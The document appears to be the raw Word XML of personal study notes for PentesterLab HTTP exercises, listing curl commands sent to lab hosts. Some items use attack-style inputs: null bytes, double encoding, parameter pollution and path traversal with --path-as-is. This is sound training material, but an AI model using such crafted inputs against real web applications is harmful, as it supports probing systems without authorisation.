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B06E" w14:textId="77777777" w:rsidR="00C2627A" w:rsidRDefault="00C2627A" w:rsidP="00C2627A">
      <w:r>
        <w:t>Get method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56184E64" w14:textId="77777777" w:rsidR="00C2627A" w:rsidRDefault="00C2627A" w:rsidP="00C2627A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cookie header:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245ED928" w14:textId="3A8331BF" w:rsidR="00C2627A" w:rsidRDefault="00C2627A" w:rsidP="00C2627A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>curl.exe http://ptl-69bf88aa-48ecd45d.libcurl.so/pentesterlab -H 'Cookie: key=please'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535B7871" w14:textId="77777777" w:rsidR="00C2627A" w:rsidRDefault="00C2627A" w:rsidP="00C2627A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Content-type header:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47624010" w14:textId="7A7AC81A" w:rsidR="00C2627A" w:rsidRDefault="00C2627A" w:rsidP="00C2627A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>curl.exe http://ptl-13e3f85e-a3bb7fde.libcurl.so/pentesterlab -H 'Content-Type: key/please'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086F6625" w14:textId="77777777" w:rsidR="00C2627A" w:rsidRDefault="00C2627A" w:rsidP="00C2627A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Accept lang header:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3781B0" w14:textId="020CF0A0" w:rsidR="00C2627A" w:rsidRDefault="00C2627A" w:rsidP="00C2627A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>curl.exe http://ptl-13a94780-28acc32f.libcurl.so/pentesterlab -H 'Accept-Language: key-please'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D257D8" w14:textId="77777777" w:rsidR="00EF7D13" w:rsidRDefault="00EF7D13" w:rsidP="00EF7D13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Get request with post parameter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366FF4E7" w14:textId="7C33E5A0" w:rsidR="00EA2120" w:rsidRDefault="00EF7D13" w:rsidP="00EA2120">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF7D13">
        <w:t>curl.exe http://ptl-3d4a2c0f-e98a8ba2.libcurl.so/pentesterlab --data `key=please' -X GET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFD1A8A" w14:textId="315C7DF5" w:rsidR="00EA2120" w:rsidRDefault="00EA2120" w:rsidP="00EA2120">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Get request with same name and value parameter to be passed twice in same req:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769EF416" w14:textId="77D8860A" w:rsidR="00EA2120" w:rsidRDefault="00EA2120" w:rsidP="00EF7D13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA2120">
        <w:t>curl.exe 'http://ptl-64964fe7-84957816.libcurl.so/pentesterlab?key=please&amp;key=please'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489B22E5" w14:textId="1CFCEA82" w:rsidR="00675827" w:rsidRDefault="00675827" w:rsidP="00675827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00675827">
        <w:t>In this challenge your goal is to send a POST request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00675827">
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00675827">
        <w:t xml:space="preserve"> with the following GET parameter key with the value please and the following POST parameter key with the value please</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBD3127" w14:textId="58DA12D8" w:rsidR="00675827" w:rsidRDefault="00675827" w:rsidP="00675827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00675827">
        <w:t>curl http://ptl-7de0c098-7662b2a5.libcurl.so/pentesterlab?key=please --data 'key=please'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4111D6C3" w14:textId="33568A61" w:rsidR="00BD3513" w:rsidRDefault="00BD3513" w:rsidP="00BD3513">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3513">
        <w:t>GET request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3513">
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3513">
        <w:t xml:space="preserve"> with the following GET parameter: key with the value =please</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5C9578" w14:textId="14B513DC" w:rsidR="00C2627A" w:rsidRDefault="00BD3513" w:rsidP="00BD3513">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3513">
        <w:t xml:space="preserve">curl http://ptl-fde2a65d-4dce2459.libcurl.so/pentesterlab?key==please  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C79DF1" w14:textId="640D6FCA" w:rsidR="00BD3513" w:rsidRDefault="00BD3513" w:rsidP="00BD3513">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3513">
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3513">
        <w:t>http://ptl-fde2a65d-4dce2459.libcurl.so/pentesterlab?key==please</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3513">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72868F97" w14:textId="459A7903" w:rsidR="00BD3513" w:rsidRDefault="00BD3513" w:rsidP="00BD3513">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3513">
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3513">
        <w:t>http://ptl-fde2a65d-4dce2459.libcurl.so/pentesterlab?key=</w:t>
      </w:r>
      <w:r>
        <w:t>%3d</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3513">
        <w:t>please</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3513">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522149B8" w14:textId="0B771D05" w:rsidR="00826782" w:rsidRDefault="00826782" w:rsidP="00826782">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00826782">
        <w:t>GET request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00826782">
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00826782">
        <w:t xml:space="preserve"> with the following GET parameter: key with the value please</w:t>
      </w:r>
      <w:r>
        <w:t>&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A108E1" w14:textId="325B2334" w:rsidR="00826782" w:rsidRDefault="00826782" w:rsidP="00826782">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00826782">
        <w:t>curl 'http://ptl-0b300561-b708142f.libcurl.so/pentesterlab?key=please%26'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D624420" w14:textId="7433318E" w:rsidR="00826782" w:rsidRDefault="00826782" w:rsidP="00826782">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00826782">
        <w:t>GET request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00826782">
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00826782">
        <w:t xml:space="preserve"> with the following GET parameter: ?key with the value please</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA85637" w14:textId="2531C565" w:rsidR="00826782" w:rsidRDefault="00826782" w:rsidP="00826782">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00826782">
        <w:t>curl 'http://ptl-af8bb494-363147d6.libcurl.so/pentesterlab?%3fkey=please'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016E68BF" w14:textId="65070C9E" w:rsidR="00022DE7" w:rsidRDefault="00022DE7" w:rsidP="00022DE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022DE7">
        <w:t>GET request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022DE7">
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022DE7">
        <w:t xml:space="preserve"> with the following GET parameter: key with the value </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00022DE7">
        <w:t>pretty please</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5A7BECA4" w14:textId="0ED658EC" w:rsidR="00022DE7" w:rsidRDefault="00022DE7" w:rsidP="00022DE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00022DE7">
        <w:t>curl 'http://ptl-8063ddeb-36ab95f2.libcurl.so/pentesterlab?key=pretty+please'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501E1E0A" w14:textId="77932252" w:rsidR="00022DE7" w:rsidRDefault="004419B9" w:rsidP="004419B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004419B9">
        <w:t>GET request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004419B9">
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004419B9">
        <w:t xml:space="preserve"> with the following GET parameter: key with the value please followed by a NULL Byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6298AAE2" w14:textId="011C1065" w:rsidR="004419B9" w:rsidRDefault="004419B9" w:rsidP="004419B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="004419B9">
        <w:t>curl 'http://ptl-36ed53cc-92479d85.libcurl.so/pentesterlab?key=please%00'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CADAF16" w14:textId="4BCCC8A0" w:rsidR="00283759" w:rsidRDefault="00283759" w:rsidP="00283759">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00283759">
        <w:t>GET request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00283759">
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00283759">
        <w:t xml:space="preserve"> with the following GET parameter: key with the value please followed by a double-encoded NULL Byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3974A0" w14:textId="0ADE9F2D" w:rsidR="00283759" w:rsidRDefault="00283759" w:rsidP="00283759">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00283759">
        <w:t>url 'http://ptl-99fe218c-e19a2557.libcurl.so/pentesterlab?key=please%2500'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198D3B58" w14:textId="448EBDCC" w:rsidR="007305ED" w:rsidRDefault="007305ED" w:rsidP="00A37C9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>GET request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with the following GET` parameter: key as an array with the first element with the value key and the second element with the value please. To send a parameter as an array, you can use the following syntax: name[0]=value1&amp;name[1]=value2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33141001" w14:textId="5C1B6AED" w:rsidR="007305ED" w:rsidRDefault="007305ED" w:rsidP="007305ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="007305ED">
        <w:t>curl 'http://ptl-6742ba50-eec0ed59.libcurl.so/pentesterlab?key%5B0%5D=key&amp;key%5B1%5D=please'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E1FCB6" w14:textId="151481B8" w:rsidR="0058541B" w:rsidRDefault="0058541B" w:rsidP="0058541B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0058541B">
        <w:t>GET request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058541B">
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058541B">
        <w:t xml:space="preserve"> with the following GET parameter: key as a hash/dictionary with the key please set to 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F8E100" w14:textId="7866C21C" w:rsidR="0058541B" w:rsidRDefault="0058541B" w:rsidP="0058541B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="007305ED">
        <w:t>curl 'http://ptl-6742ba50-eec0ed59.libcurl.so/pentesterlab?key%5B</w:t>
      </w:r>
      <w:r>
        <w:t>please</w:t>
      </w:r>
      <w:r w:rsidRPr="007305ED">
        <w:t>%5D=</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="007305ED">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EB396B" w14:textId="63EAEA0F" w:rsidR="0058541B" w:rsidRDefault="0058541B" w:rsidP="0058541B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="007305ED">
        <w:t>curl 'http://ptl-6742ba50-eec0ed59.libcurl.so/pentesterlab?key</w:t>
      </w:r>
      <w:r>
        <w:t>[please]</w:t>
      </w:r>
      <w:r w:rsidRPr="007305ED">
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="007305ED">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1195E65E" w14:textId="6E0B4DB4" w:rsidR="008918D7" w:rsidRDefault="008918D7" w:rsidP="00062ED1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008918D7">
        <w:t>GET request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008918D7">
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008918D7">
        <w:t>/..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008918D7">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008918D7">
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008918D7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC12D6F" w14:textId="59FA88AD" w:rsidR="0058541B" w:rsidRDefault="008918D7" w:rsidP="0058541B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="008918D7">
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008918D7">
        <w:t>http://ptl-7dfc7187-cc492122.libcurl.so/pentesterlab/..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008918D7">
        <w:t>/pentesterlab -v --path-as-is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344BD447" w14:textId="77777777" w:rsidR="0058541B" w:rsidRDefault="0058541B" w:rsidP="007305ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A198C3D" w14:textId="34AE4367" w:rsidR="00C2627A" w:rsidRDefault="00C2627A" w:rsidP="00C2627A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Post method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C55698" w14:textId="77777777" w:rsidR="00C2627A" w:rsidRDefault="00C2627A" w:rsidP="00C2627A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>With post data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EBC791" w14:textId="11AA99E1" w:rsidR="00FC5C61" w:rsidRDefault="00C2627A" w:rsidP="00C2627A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>curl.exe http://ptl-c51c0f6c-8677502e.libcurl.so/pentesterlab -X POST –</w:t>
      </w:r>
      <w:r w:rsidR="00EF7D13">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>data ‘key=please’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C16586" w14:textId="77777777" w:rsidR="00C2627A" w:rsidRDefault="00C2627A" w:rsidP="00C2627A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>With out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> data or empty body:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008C2B6E" w14:textId="1F59209A" w:rsidR="00C2627A" w:rsidRDefault="00C2627A" w:rsidP="00C2627A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">curl.exe http://ptl-c51c0f6c-8677502e.libcurl.so/pentesterlab -X POST </w:t>
      </w:r>
      <w:r w:rsidR="00EF7D13">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>data ‘key=please’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E933C02" w14:textId="4338DF3A" w:rsidR="00675827" w:rsidRDefault="00675827" w:rsidP="00675827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Post request with same name and value parameter to be passed twice in same req:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39447C54" w14:textId="6C34AA05" w:rsidR="00675827" w:rsidRDefault="00675827" w:rsidP="00675827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00675827">
        <w:t>curl http://ptl-a22e4fe3-ed956288.libcurl.so/pentesterlab -X POST --data 'key=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00675827">
        <w:t>please&amp;key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00675827">
        <w:t>=please'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6B8192" w14:textId="1A4B76AA" w:rsidR="00CC7644" w:rsidRDefault="00CC7644" w:rsidP="00CC7644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC7644">
        <w:t>POST request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC7644">
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC7644">
        <w:t xml:space="preserve"> with the body of the request containing: &lt;key&gt;&lt;value&gt;please&lt;/value&gt;&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C14113A" w14:textId="2376F7FF" w:rsidR="00CC7644" w:rsidRDefault="00CC7644" w:rsidP="00CC7644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC7644">
        <w:t>curl http://ptl-7983b1b9-06078874.libcurl.so/pentesterlab --data '&lt;key&gt;&lt;value&gt;please&lt;/value&gt;&lt;/key&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2614BAEB" w14:textId="3D19517C" w:rsidR="00004065" w:rsidRDefault="00004065" w:rsidP="00004065">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00004065">
        <w:t>POST request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00004065">
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00004065">
        <w:t xml:space="preserve"> with the body of the request containing: &lt;key&gt;&lt;value&gt;please&lt;/value&gt;&lt;/key&gt; and the header Content-Type set to application/xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247FA754" w14:textId="28AF0DA8" w:rsidR="00004065" w:rsidRDefault="00004065" w:rsidP="00CC7644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00004065">
        <w:t>curl http://ptl-7ad04514-a07879c1.libcurl.so/pentesterlab --data '&lt;key&gt;&lt;value&gt;please&lt;/value&gt;&lt;/key&gt;' -H '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00004065">
        <w:t>Content-Type:application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00004065">
        <w:t>/xml'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EABA5CB" w14:textId="589A8C4C" w:rsidR="00FB6EDB" w:rsidRDefault="00FB6EDB" w:rsidP="00FB6EDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB6EDB">
        <w:t>POST request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB6EDB">
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB6EDB">
        <w:t xml:space="preserve"> with the body of the request containing the following XML: &lt;key&gt;&lt;value&gt;[VALUE]&lt;/value&gt;&lt;/key&gt; where [VALUE] should be replaced with &amp;please. The request should also set the header Content-Type to application/xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FEE404" w14:textId="4F4F0FE4" w:rsidR="00FB6EDB" w:rsidRDefault="00FB6EDB" w:rsidP="00CC7644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB6EDB">
        <w:t>curl http://ptl-d46828fc-7bb3340d.libcurl.so/pentesterlab --data '&lt;key&gt;&lt;value&gt;&lt;![CDATA[&amp;please]]&gt;&lt;/value&gt;&lt;/key&gt;' -H '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB6EDB">
        <w:t>Content-Type:application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB6EDB">
        <w:t>/xml'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DEC231" w14:textId="7452B6E4" w:rsidR="00C2627A" w:rsidRDefault="00C2627A" w:rsidP="00C2627A"/>
    <w:p w14:paraId="243F4476" w14:textId="7C9E67A6" w:rsidR="008D310E" w:rsidRDefault="008D310E" w:rsidP="00C2627A">
      <w:r>
        <w:t>Basic authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C046CCF" w14:textId="07EFBA96" w:rsidR="008D310E" w:rsidRDefault="008D310E" w:rsidP="00C2627A">
      <w:r w:rsidRPr="008D310E">
        <w:t>GET request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D310E">
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D310E">
        <w:t xml:space="preserve"> with an authentication Basic with the username key and the password </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D310E">
        <w:t>please.</w:t>
      </w:r>
      <w:r w:rsidR="00A445D7">
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B7E913D" w14:textId="2ADCD135" w:rsidR="008D310E" w:rsidRDefault="008D310E" w:rsidP="00C2627A">
      <w:r w:rsidRPr="008D310E">
        <w:t>curl http://ptl-fe8948dc-53da37f3.libcurl.so/pentesterlab -u '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D310E">
        <w:t>key:please</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D310E">
        <w:t xml:space="preserve">'  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762AB752" w14:textId="77777777" w:rsidR="008D310E" w:rsidRDefault="008D310E" w:rsidP="00C2627A"/>
    <w:p w14:paraId="0066BDCE" w14:textId="67F69DBF" w:rsidR="00C2627A" w:rsidRDefault="002050B6" w:rsidP="00C2627A">
      <w:r>
        <w:t>Multipart:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30220FED" w14:textId="6FCB5FCE" w:rsidR="002050B6" w:rsidRDefault="002050B6" w:rsidP="00C2627A">
      <w:r w:rsidRPr="002050B6">
        <w:t>request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002050B6">
        <w:t>pentesterlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002050B6">
        <w:t xml:space="preserve"> using HTTP multipart with a file (at least one byte in size) using the parameter name: filename</w:t>
      </w:r>
    </w:p>
